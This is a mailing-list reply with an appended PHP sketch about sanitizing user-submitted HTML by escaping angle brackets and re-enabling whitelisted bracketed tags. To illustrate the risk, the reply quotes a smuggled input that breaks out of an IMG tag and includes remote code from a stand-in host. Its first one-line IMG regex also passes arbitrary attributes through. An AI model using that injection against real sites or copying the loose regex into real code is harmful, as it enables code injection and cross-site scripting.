> I'm developing a web application with PHP and MySQL for data entry. I need
> to "sanitize" the HTML that my users enter (i.e. remove all HTML tags
> except for BR, P, IMG, etc.). I've been trying to use a regular expression
> to do this, but it's not working yet. Anyone have any suggestions? If I
> can't do it in a single regular expression, it makes the code rather
> complex.

If you want to do it simply, you might be better off borrowing a strategy
from UBB -- remove *all* HTML codes (or globally convert < and > to &lt;
and &gt;), convert newlines to <BR>, and give your users the option to use
"approved" tags by enclosing them in square brackets or something.

i.e. [IMG SRC="/path/to/image"] is easily handled by

    $output = preg_replace("/\[IMG (.+?)\]/", "<IMG \\1>", $input);

(This *only* works if you globally replace the angle brackets *first* --
otherwise, a clever user could do something like
"[IMG SRC="whocares.gif"><? include "http://hax0r.com/some.random.js" ?]")

Trying to do it all in a single regexp may not be a good thing, as you'll
almost certainly have to edit that regexp over time, and it's much easier
to deal with a lot of simple regexps than one big complicated one.

Check out the docs on preg_replace() -- there's actually a good recipe for
what you're trying to do right on that page:

http://www.php3.org/manual/function.preg-replace.php

preg_replace() is much more powerful than ereg_replace() and its relatives.

-- 
Eric Hillman
UNIX Sysadmin/Webmaster
City & County Credit Union
ehillman at cccu.com

---------------------------------------------------------------------
To unsubscribe, e-mail: tclug-list-unsubscribe at mn-linux.org
For additional commands, e-mail: tclug-list-help at mn-linux.org
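
For what it's worth, the strategy in the reply above (escape everything
first, then re-enable bracketed tags with a few simple regexps, then
convert newlines) might be sketched roughly like this. The function name
sanitize_post(), the B/I/P whitelist, and the set of characters allowed in
an image URL are all assumptions made for illustration; none of them come
from the original message. htmlspecialchars() stands in for the global
angle-bracket replacement, and because it also escapes quotes, the IMG
pattern has to match &quot; rather than a literal quote.

```php
<?php
// Hypothetical helper: the name, the B/I/P whitelist and the URL character
// set are illustrative assumptions, not part of the original message.
function sanitize_post(string $input): string
{
    // 1. Neutralize all HTML first: < > & and both quote styles are escaped.
    $out = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

    // 2. Re-enable simple approved tags written as [B], [/B], [I], [/I], [P], [/P].
    $out = preg_replace('/\[(\/?)(B|I|P)\]/i', '<$1$2>', $out);

    // 3. Re-enable [IMG SRC="..."]. Quotes are &quot; at this point, and the
    //    URL may only contain a conservative set of characters, optionally
    //    prefixed with http:// or https://.
    $out = preg_replace(
        '/\[IMG SRC=&quot;((?:https?:\/\/)?[A-Za-z0-9_.\/-]+)&quot;\]/i',
        '<IMG SRC="$1">',
        $out
    );

    // 4. Convert newlines to <BR>, keeping the newline for readable source.
    return str_replace("\n", "<BR>\n", $out);
}

// Example call: the bracketed tags are converted, the raw <script> is not.
echo sanitize_post("[B]hi[/B]\n[IMG SRC=\"/path/to/image.gif\"]<script>");
```

Each rule is its own small regexp, so adding or dropping an approved tag
means touching one line rather than reworking a single large pattern. With
this sketch, the "clever user" input from the reply should come out with no
live angle brackets at all, since the IMG rule only fires when the closing
quote is immediately followed by the closing square bracket.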